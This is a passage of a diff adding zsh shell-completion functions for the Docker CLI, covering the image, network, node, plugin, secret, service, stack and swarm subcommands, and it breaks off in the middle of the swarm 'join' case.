$(__docker_arguments) \ + $opts_help \ + "($help -a --all)"{-a,--all}"[Remove all unused images, not just dangling ones]" \ + "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \ + "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 + ;; + (pull) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -a --all-tags)"{-a,--all-tags}"[Download all tagged images]" \ + "($help)--disable-content-trust[Skip image verification]" \ + "($help -):name:__docker_search" && ret=0 + ;; + (push) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)--disable-content-trust[Skip image signing]" \ + "($help -): :__docker_complete_images" && ret=0 + ;; + (rm) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --force)"{-f,--force}"[Force removal]" \ + "($help)--no-prune[Do not delete untagged parents]" \ + "($help -)*: :__docker_complete_images" && ret=0 + ;; + (save) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -o --output)"{-o=,--output=}"[Write to file]:file:_files" \ + "($help -)*: :__docker_complete_images" && ret=0 + ;; + (tag) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -):source:__docker_complete_images"\ + "($help -):destination:__docker_complete_repositories_with_tags" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_container_commands" && ret=0 + ;; + esac + + return ret +} + +# EO image + +# BO network + +__docker_network_complete_ls_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (driver) + __docker_complete_info_plugins Network && ret=0 + ;; + (id) + __docker_complete_networks_ids && ret=0 + ;; + (name) + __docker_complete_networks_names && ret=0 + ;; + (type) + type_opts=('builtin' 'custom') + _describe -t type-filter-opts "Type Filter Options" type_opts && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('driver' 'id' 'label' 'name' 'type') + _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_get_networks() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + local line s + declare -a lines networks + + type=$1; shift + + lines=(${(f)${:-"$(_call_program commands docker $docker_options network ls)"$'\n'}}) + + # Parse header line to find columns + local i=1 j=1 k header=${lines[1]} + declare -A begin end + while (( j < ${#header} - 1 )); do + i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) + j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) + k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) + begin[${header[$i,$((j-1))]}]=$i + end[${header[$i,$((j-1))]}]=$k + done + end[${header[$i,$((j-1))]}]=-1 + lines=(${lines[2,-1]}) + + # Network ID + if [[ $type = (ids|all) ]]; then + for line in $lines; do + s="${line[${begin[NETWORK ID]},${end[NETWORK ID]}]%% ##}" + s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}" + s="$s, ${${line[${begin[SCOPE]},${end[SCOPE]}]}%% ##}" + networks=($networks $s) + done + fi + + # Names + if [[ $type = (names|all) ]]; then + for line in $lines; do + s="${line[${begin[NAME]},${end[NAME]}]%% ##}" + s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}" + s="$s, ${${line[${begin[SCOPE]},${end[SCOPE]}]}%% ##}" + networks=($networks $s) + done + fi + + _describe -t networks-list "networks" networks "$@" && ret=0 + return ret +} + +__docker_complete_networks() { + [[ $PREFIX = -* ]] && return 1 + __docker_get_networks all "$@" +} + +__docker_complete_networks_ids() { + [[ $PREFIX = -* ]] && return 1 + __docker_get_networks ids "$@" +} + +__docker_complete_networks_names() { + [[ $PREFIX = -* ]] && return 1 + __docker_get_networks names "$@" +} + +__docker_network_commands() { + local -a _docker_network_subcommands + _docker_network_subcommands=( + "connect:Connect a container to a network" + "create:Creates a new network with a name specified by the user" + "disconnect:Disconnects a container from a network" + "inspect:Displays detailed information on a network" + "ls:Lists all the networks created by the user" + "prune:Remove all unused networks" + "rm:Deletes one or more networks" + ) + _describe -t docker-network-commands "docker network command" _docker_network_subcommands +} + +__docker_network_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (connect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*--alias=[Add network-scoped alias for the container]:alias: " \ + "($help)--ip=[Container IPv4 address]:IPv4: " \ + "($help)--ip6=[Container IPv6 address]:IPv6: " \ + "($help)*--link=[Add a link to another container]:link:->link" \ + "($help)*--link-local-ip=[Add a link-local address for the container]:IPv4/IPv6: " \ + "($help -)1:network:__docker_complete_networks" \ + "($help -)2:containers:__docker_complete_containers" && ret=0 + + case $state in + (link) + if compset -P "*:"; then + _wanted alias expl "Alias" compadd -E "" && ret=0 + else + __docker_complete_running_containers -qS ":" && ret=0 + fi + ;; + esac + ;; + (create) + _arguments $(__docker_arguments) -A '-*' \ + $opts_help \ + "($help)--attachable[Enable manual container attachment]" \ + "($help)*--aux-address[Auxiliary IPv4 or IPv6 addresses used by network driver]:key=IP: " \ + "($help -d --driver)"{-d=,--driver=}"[Driver to manage the Network]:driver:(null host bridge overlay)" \ + "($help)*--gateway=[IPv4 or IPv6 Gateway for the master subnet]:IP: " \ + "($help)--internal[Restricts external access to the network]" \ + "($help)*--ip-range=[Allocate container ip from a sub-range]:IP/mask: " \ + "($help)--ipam-driver=[IP Address Management Driver]:driver:(default)" \ + "($help)*--ipam-opt=[Custom IPAM plugin options]:opt=value: " \ + "($help)--ipv6[Enable IPv6 networking]" \ + "($help)*--label=[Set metadata on a network]:label=value: " \ + "($help)*"{-o=,--opt=}"[Driver specific options]:opt=value: " \ + "($help)*--subnet=[Subnet in CIDR format that represents a network segment]:IP/mask: " \ + "($help -)1:Network Name: " && ret=0 + ;; + (disconnect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)1:network:__docker_complete_networks" \ + "($help -)2:containers:__docker_complete_containers" && ret=0 + ;; + (inspect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ + "($help -)*:network:__docker_complete_networks" && ret=0 + ;; + (ls) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)--no-trunc[Do not truncate the output]" \ + "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ + "($help)--format=[Pretty-print networks using a Go template]:template: " \ + "($help -q --quiet)"{-q,--quiet}"[Only display numeric IDs]" && ret=0 + case $state in + (filter-options) + __docker_network_complete_ls_filters && ret=0 + ;; + esac + ;; + (prune) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \ + "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 + ;; + (rm) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:network:__docker_complete_networks" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_network_commands" && ret=0 + ;; + esac + + return ret +} + +# EO network + +# BO node + +__docker_node_complete_ls_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (id) + __docker_complete_nodes_ids && ret=0 + ;; + (membership) + membership_opts=('accepted' 'pending' 'rejected') + _describe -t membership-opts "membership options" membership_opts && ret=0 + ;; + (name) + __docker_complete_nodes_names && ret=0 + ;; + (role) + role_opts=('manager' 'worker') + _describe -t role-opts "role options" role_opts && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('id' 'label' 'membership' 'name' 'role') + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_node_complete_ps_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (desired-state) + state_opts=('accepted' 'running') + _describe -t state-opts "desired state options" state_opts && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('desired-state' 'id' 'label' 'name') + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_nodes() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + local line s + declare -a lines nodes args + + type=$1; shift + filter=$1; shift + [[ $filter != "none" ]] && args=("-f $filter") + + lines=(${(f)${:-"$(_call_program commands docker $docker_options node ls $args)"$'\n'}}) + # Parse header line to find columns + local i=1 j=1 k header=${lines[1]} + declare -A begin end + while (( j < ${#header} - 1 )); do + i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) + j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) + k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) + begin[${header[$i,$((j-1))]}]=$i + end[${header[$i,$((j-1))]}]=$k + done + end[${header[$i,$((j-1))]}]=-1 + lines=(${lines[2,-1]}) + + # Node ID + if [[ $type = (ids|all) ]]; then + for line in $lines; do + s="${line[${begin[ID]},${end[ID]}]%% ##}" + nodes=($nodes $s) + done + fi + + # Names + if [[ $type = (names|all) ]]; then + for line in $lines; do + s="${line[${begin[NAME]},${end[NAME]}]%% ##}" + nodes=($nodes $s) + done + fi + + _describe -t nodes-list "nodes" nodes "$@" && ret=0 + return ret +} + +__docker_complete_nodes() { + [[ $PREFIX = -* ]] && return 1 + __docker_nodes all none "$@" +} + +__docker_complete_nodes_ids() { + [[ $PREFIX = -* ]] && return 1 + __docker_nodes ids none "$@" +} + +__docker_complete_nodes_names() { + [[ $PREFIX = -* ]] && return 1 + __docker_nodes names none "$@" +} + +__docker_complete_pending_nodes() { + [[ $PREFIX = -* ]] && return 1 + __docker_nodes all "membership=pending" "$@" +} + +__docker_complete_manager_nodes() { + [[ $PREFIX = -* ]] && return 1 + __docker_nodes all "role=manager" "$@" +} + +__docker_complete_worker_nodes() { + [[ $PREFIX = -* ]] && return 1 + __docker_nodes all "role=worker" "$@" +} + +__docker_node_commands() { + local -a _docker_node_subcommands + _docker_node_subcommands=( + "demote:Demote a node as manager in the swarm" + "inspect:Display detailed information on one or more nodes" + "ls:List nodes in the swarm" + "promote:Promote a node as manager in the swarm" + "rm:Remove one or more nodes from the swarm" + "ps:List tasks running on one or more nodes, defaults to current node" + "update:Update a node" + ) + _describe -t docker-node-commands "docker node command" _docker_node_subcommands +} + +__docker_node_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (rm|remove) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --force)"{-f,--force}"[Force remove a node from the swarm]" \ + "($help -)*:node:__docker_complete_pending_nodes" && ret=0 + ;; + (demote) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:node:__docker_complete_manager_nodes" && ret=0 + ;; + (inspect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ + "($help)--pretty[Print the information in a human friendly format]" \ + "($help -)*:node:__docker_complete_nodes" && ret=0 + ;; + (ls|list) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ + "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0 + case $state in + (filter-options) + __docker_node_complete_ls_filters && ret=0 + ;; + esac + ;; + (promote) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:node:__docker_complete_worker_nodes" && ret=0 + ;; + (ps) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -a --all)"{-a,--all}"[Display all instances]" \ + "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ + "($help)--no-resolve[Do not map IDs to Names]" \ + "($help)--no-trunc[Do not truncate output]" \ + "($help -)*:node:__docker_complete_nodes" && ret=0 + case $state in + (filter-options) + __docker_node_complete_ps_filters && ret=0 + ;; + esac + ;; + (update) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)--availability=[Availability of the node]:availability:(active pause drain)" \ + "($help)*--label-add=[Add or update a node label]:key=value: " \ + "($help)*--label-rm=[Remove a node label if exists]:label: " \ + "($help)--role=[Role of the node]:role:(manager worker)" \ + "($help -)1:node:__docker_complete_nodes" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_node_commands" && ret=0 + ;; + esac + + return ret +} + +# EO node + +# BO plugin + +__docker_complete_plugins() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + local line s + declare -a lines plugins + + lines=(${(f)${:-"$(_call_program commands docker $docker_options plugin ls)"$'\n'}}) + + # Parse header line to find columns + local i=1 j=1 k header=${lines[1]} + declare -A begin end + while (( j < ${#header} - 1 )); do + i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) + j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) + k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) + begin[${header[$i,$((j-1))]}]=$i + end[${header[$i,$((j-1))]}]=$k + done + end[${header[$i,$((j-1))]}]=-1 + lines=(${lines[2,-1]}) + + # Name + for line in $lines; do + s="${line[${begin[NAME]},${end[NAME]}]%% ##}" + s="$s:${(l:7:: :::)${${line[${begin[TAG]},${end[TAG]}]}%% ##}}" + plugins=($plugins $s) + done + + _describe -t plugins-list "plugins" plugins "$@" && ret=0 + return ret +} + +__docker_plugin_commands() { + local -a _docker_plugin_subcommands + _docker_plugin_subcommands=( + "disable:Disable a plugin" + "enable:Enable a plugin" + "inspect:Return low-level information about a plugin" + "install:Install a plugin" + "ls:List plugins" + "push:Push a plugin" + "rm:Remove a plugin" + "set:Change settings for a plugin" + ) + _describe -t docker-plugin-commands "docker plugin command" _docker_plugin_subcommands +} + +__docker_plugin_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (disable|enable|inspect|ls|push|rm) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)1:plugin:__docker_complete_plugins" && ret=0 + ;; + (install) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)--alias=[Local name for plugin]:alias: " \ + "($help -)1:plugin:__docker_complete_plugins" && ret=0 + ;; + (set) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)1:plugin:__docker_complete_plugins" \ + "($help-)*:key=value: " && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_plugin_commands" && ret=0 + ;; + esac + + return ret +} + +# EO plugin + +# BO secret + +__docker_secrets() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + local line s + declare -a lines secrets + + type=$1; shift + + lines=(${(f)${:-"$(_call_program commands docker $docker_options secret ls)"$'\n'}}) + + # Parse header line to find columns + local i=1 j=1 k header=${lines[1]} + declare -A begin end + while (( j < ${#header} - 1 )); do + i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) + j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) + k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) + begin[${header[$i,$((j-1))]}]=$i + end[${header[$i,$((j-1))]}]=$k + done + end[${header[$i,$((j-1))]}]=-1 + lines=(${lines[2,-1]}) + + # ID + if [[ $type = (ids|all) ]]; then + for line in $lines; do + s="${line[${begin[ID]},${end[ID]}]%% ##}" + secrets=($secrets $s) + done + fi + + # Names + if [[ $type = (names|all) ]]; then + for line in $lines; do + s="${line[${begin[NAME]},${end[NAME]}]%% ##}" + secrets=($secrets $s) + done + fi + + _describe -t secrets-list "secrets" secrets "$@" && ret=0 + return ret +} + +__docker_complete_secrets() { + [[ $PREFIX = -* ]] && return 1 + __docker_secrets all "$@" +} + +__docker_secret_commands() { + local -a _docker_secret_subcommands + _docker_secret_subcommands=( + "create:Create a secret using stdin as content" + "inspect:Display detailed information on one or more secrets" + "ls:List secrets" + "rm:Remove one or more secrets" + ) + _describe -t docker-secret-commands "docker secret command" _docker_secret_subcommands +} + +__docker_secret_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (create) + _arguments $(__docker_arguments) -A '-*' \ + $opts_help \ + "($help)*"{-l=,--label=}"[Secret labels]:label: " \ + "($help -):secret: " && ret=0 + ;; + (inspect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given Go template]:template: " \ + "($help -)*:secret:__docker_complete_secrets" && ret=0 + ;; + (ls|list) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0 + ;; + (rm|remove) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:secret:__docker_complete_secrets" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_secret_commands" && ret=0 + ;; + esac + + return ret +} + +# EO secret + +# BO service + +__docker_service_complete_ls_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (id) + __docker_complete_services_ids && ret=0 + ;; + (name) + __docker_complete_services_names && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('id' 'label' 'name') + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_service_complete_ps_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (desired-state) + state_opts=('accepted' 'running') + _describe -t state-opts "desired state options" state_opts && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('desired-state' 'id' 'label' 'name') + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_services() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + local line s + declare -a lines services + + type=$1; shift + + lines=(${(f)${:-"$(_call_program commands docker $docker_options service ls)"$'\n'}}) + + # Parse header line to find columns + local i=1 j=1 k header=${lines[1]} + declare -A begin end + while (( j < ${#header} - 1 )); do + i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) + j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) + k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) + begin[${header[$i,$((j-1))]}]=$i + end[${header[$i,$((j-1))]}]=$k + done + end[${header[$i,$((j-1))]}]=-1 + lines=(${lines[2,-1]}) + + # Service ID + if [[ $type = (ids|all) ]]; then + for line in $lines; do + s="${line[${begin[ID]},${end[ID]}]%% ##}" + s="$s:${(l:7:: :::)${${line[${begin[IMAGE]},${end[IMAGE]}]}%% ##}}" + services=($services $s) + done + fi + + # Names + if [[ $type = (names|all) ]]; then + for line in $lines; do + s="${line[${begin[NAME]},${end[NAME]}]%% ##}" + s="$s:${(l:7:: :::)${${line[${begin[IMAGE]},${end[IMAGE]}]}%% ##}}" + services=($services $s) + done + fi + + _describe -t services-list "services" services "$@" && ret=0 + return ret +} + +__docker_complete_services() { + [[ $PREFIX = -* ]] && return 1 + __docker_services all "$@" +} + +__docker_complete_services_ids() { + [[ $PREFIX = -* ]] && return 1 + __docker_services ids "$@" +} + +__docker_complete_services_names() { + [[ $PREFIX = -* ]] && return 1 + __docker_services names "$@" +} + +__docker_service_commands() { + local -a _docker_service_subcommands + _docker_service_subcommands=( + "create:Create a new service" + "inspect:Display detailed information on one or more services" + "ls:List services" + "rm:Remove one or more services" + "scale:Scale one or multiple replicated services" + "ps:List the tasks of a service" + "update:Update a service" + ) + _describe -t docker-service-commands "docker service command" _docker_service_subcommands +} + +__docker_service_subcommand() { + local -a _command_args opts_help opts_create_update + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + opts_create_update=( + "($help)*--constraint=[Placement constraints]:constraint: " + "($help)--endpoint-mode=[Placement constraints]:mode:(dnsrr vip)" + "($help)*"{-e=,--env=}"[Set environment variables]:env: " + "($help)--health-cmd=[Command to run to check health]:command: " + "($help)--health-interval=[Time between running the check]:time: " + "($help)--health-retries=[Consecutive failures needed to report unhealthy]:retries:(1 2 3 4 5)" + "($help)--health-timeout=[Maximum time to allow one check to run]:time: " + "($help)--hostname=[Service container hostname]:hostname: " \ + "($help)*--label=[Service labels]:label: " + "($help)--limit-cpu=[Limit CPUs]:value: " + "($help)--limit-memory=[Limit Memory]:value: " + "($help)--log-driver=[Logging driver for service]:logging driver:__docker_complete_log_drivers" + "($help)*--log-opt=[Logging driver options]:log driver options:__docker_complete_log_options" + "($help)*--mount=[Attach a filesystem mount to the service]:mount: " + "($help)*--network=[Network attachments]:network: " + "($help)--no-healthcheck[Disable any container-specified HEALTHCHECK]" + "($help)*"{-p=,--publish=}"[Publish a port as a node port]:port: " + "($help)--replicas=[Number of tasks]:replicas: " + "($help)--reserve-cpu=[Reserve CPUs]:value: " + "($help)--reserve-memory=[Reserve Memory]:value: " + "($help)--restart-condition=[Restart when condition is met]:mode:(any none on-failure)" + "($help)--restart-delay=[Delay between restart attempts]:delay: " + "($help)--restart-max-attempts=[Maximum number of restarts before giving up]:max-attempts: " + "($help)--restart-window=[Window used to evaluate the restart policy]:window: " + "($help)*--secret=[Specify secrets to expose to the service]:secret:__docker_complete_secrets" + "($help)--stop-grace-period=[Time to wait before force killing a container]:grace period: " + "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-TTY]" + "($help)--update-delay=[Delay between updates]:delay: " + "($help)--update-failure-action=[Action on update failure]:mode:(pause continue)" + "($help)--update-max-failure-ratio=[Failure rate to tolerate during an update]:fraction: " + "($help)--update-monitor=[Duration after each task update to monitor for failure]:window: " + "($help)--update-parallelism=[Maximum number of tasks updated simultaneously]:number: " + "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users" + "($help)--with-registry-auth[Send registry authentication details to swarm agents]" + "($help -w --workdir)"{-w=,--workdir=}"[Working directory inside the container]:directory:_directories" + ) + + case "$words[1]" in + (create) + _arguments $(__docker_arguments) \ + $opts_help \ + $opts_create_update \ + "($help)*--container-label=[Container labels]:label: " \ + "($help)*--dns=[Set custom DNS servers]:DNS: " \ + "($help)*--dns-option=[Set DNS options]:DNS option: " \ + "($help)*--dns-search=[Set custom DNS search domains]:DNS search: " \ + "($help)*--env-file=[Read environment variables from a file]:environment file:_files" \ + "($help)--mode=[Service Mode]:mode:(global replicated)" \ + "($help)--name=[Service name]:name: " \ + "($help)*--publish=[Publish a port]:port: " \ + "($help -): :__docker_complete_images" \ + "($help -):command: _command_names -e" \ + "($help -)*::arguments: _normal" && ret=0 + ;; + (inspect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ + "($help)--pretty[Print the information in a human friendly format]" \ + "($help -)*:service:__docker_complete_services" && ret=0 + ;; + (ls|list) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:->filter-options" \ + "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0 + case $state in + (filter-options) + __docker_service_complete_ls_filters && ret=0 + ;; + esac + ;; + (rm|remove) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:service:__docker_complete_services" && ret=0 + ;; + (scale) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:service:->values" && ret=0 + case $state in + (values) + if compset -P '*='; then + _message 'replicas' && ret=0 + else + __docker_complete_services -qS "=" + fi + ;; + esac + ;; + (ps) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ + "($help)--no-resolve[Do not map IDs to Names]" \ + "($help)--no-trunc[Do not truncate output]" \ + "($help -q --quiet)"{-q,--quiet}"[Only display task IDs]" \ + "($help -)1:service:__docker_complete_services" && ret=0 + case $state in + (filter-options) + __docker_service_complete_ps_filters && ret=0 + ;; + esac + ;; + (update) + _arguments $(__docker_arguments) \ + $opts_help \ + $opts_create_update \ + "($help)--arg=[Service command args]:arguments: _normal" \ + "($help)*--container-label-add=[Add or update container labels]:label: " \ + "($help)*--container-label-rm=[Remove a container label by its key]:label: " \ + "($help)*--dns-add=[Add or update custom DNS servers]:DNS: " \ + "($help)*--dns-rm=[Remove custom DNS servers]:DNS: " \ + "($help)*--dns-option-add=[Add or update DNS options]:DNS option: " \ + "($help)*--dns-option-rm=[Remove DNS options]:DNS option: " \ + "($help)*--dns-search-add=[Add or update custom DNS search domains]:DNS search: " \ + "($help)*--dns-search-rm=[Remove DNS search domains]:DNS search: " \ + "($help)--force[Force update]" \ + "($help)*--group-add=[Add additional supplementary user groups to the container]:group:_groups" \ + "($help)*--group-rm=[Remove previously added supplementary user groups from the container]:group:_groups" \ + "($help)--image=[Service image tag]:image:__docker_complete_repositories" \ + "($help)*--publish-add=[Add or update a port]:port: " \ + "($help)*--publish-rm=[Remove a port(target-port mandatory)]:port: " \ + "($help)--rollback[Rollback to previous specification]" \ + "($help -)1:service:__docker_complete_services" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_service_commands" && ret=0 + ;; + esac + + return ret +} + +# EO service + +# BO stack + +__docker_stack_complete_ps_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (desired-state) + state_opts=('accepted' 'running') + _describe -t state-opts "desired state options" state_opts && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('desired-state' 'id' 'name') + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_stack_complete_services_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('id' 'label' 'name') + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_stacks() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + local line s + declare -a lines stacks + + lines=(${(f)${:-"$(_call_program commands docker $docker_options stack ls)"$'\n'}}) + + # Parse header line to find columns + local i=1 j=1 k header=${lines[1]} + declare -A begin end + while (( j < ${#header} - 1 )); do + i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) + j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) + k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) + begin[${header[$i,$((j-1))]}]=$i + end[${header[$i,$((j-1))]}]=$k + done + end[${header[$i,$((j-1))]}]=-1 + lines=(${lines[2,-1]}) + + # Service ID + for line in $lines; do + s="${line[${begin[ID]},${end[ID]}]%% ##}" + stacks=($stacks $s) + done + + _describe -t stacks-list "stacks" stacks "$@" && ret=0 + return ret +} + +__docker_complete_stacks() { + [[ $PREFIX = -* ]] && return 1 + __docker_stacks "$@" +} + +__docker_stack_commands() { + local -a _docker_stack_subcommands + _docker_stack_subcommands=( + "deploy:Deploy a new stack or update an existing stack" + "ls:List stacks" + "ps:List the tasks in the stack" + "rm:Remove the stack" + "services:List the services in the stack" + ) + _describe -t docker-stack-commands "docker stack command" _docker_stack_subcommands +} + +__docker_stack_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (deploy|up) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)--bundle-file=[Path to a Distributed Application Bundle file]:dab:_files -g \"*.dab\"" \ + "($help -c --compose-file)"{-c=,--compose-file=}"[Path to a Compose file]:compose file:_files -g \"*.(yml|yaml)\"" \ + "($help)--with-registry-auth[Send registry authentication details to Swarm agents]" \ + "($help -):stack:__docker_complete_stacks" && ret=0 + ;; + (ls|list) + _arguments $(__docker_arguments) \ + $opts_help && ret=0 + ;; + (ps) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -a --all)"{-a,--all}"[Display all tasks]" \ + "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:__docker_stack_complete_ps_filters" \ + "($help)--no-resolve[Do not map IDs to Names]" \ + "($help)--no-trunc[Do not truncate output]" \ + "($help -):stack:__docker_complete_stacks" && ret=0 + ;; + (rm|remove|down) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -):stack:__docker_complete_stacks" && ret=0 + ;; + (services) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:__docker_stack_complete_services_filters" \ + "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" \ + "($help -):stack:__docker_complete_stacks" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_stack_commands" && ret=0 + ;; + esac + + return ret +} + +# EO stack + +# BO swarm + +__docker_swarm_commands() { + local -a _docker_swarm_subcommands + _docker_swarm_subcommands=( + "init:Initialize a swarm" + "join:Join a swarm as a node and/or manager" + "join-token:Manage join tokens" + "leave:Leave a swarm" + "update:Update the swarm" + ) + _describe -t docker-swarm-commands "docker swarm command" _docker_swarm_subcommands +} + +__docker_swarm_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (init) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)--advertise-addr[Advertised address]:ip\:port: " \ + "($help)*--external-ca=[Specifications of one or more certificate signing endpoints]:endpoint: " \ + "($help)--force-new-cluster[Force create a new cluster from current state]" \ + "($help)--listen-addr=[Listen address]:ip\:port: " \ + "($help)--max-snapshots[Number of additional Raft snapshots to retain]" \ + "($help)--snapshot-interval[Number of log entries between Raft snapshots]" \ + "($help)--task-history-limit=[Task history retention limit]:limit: " && ret=0 + ;; + (join) + 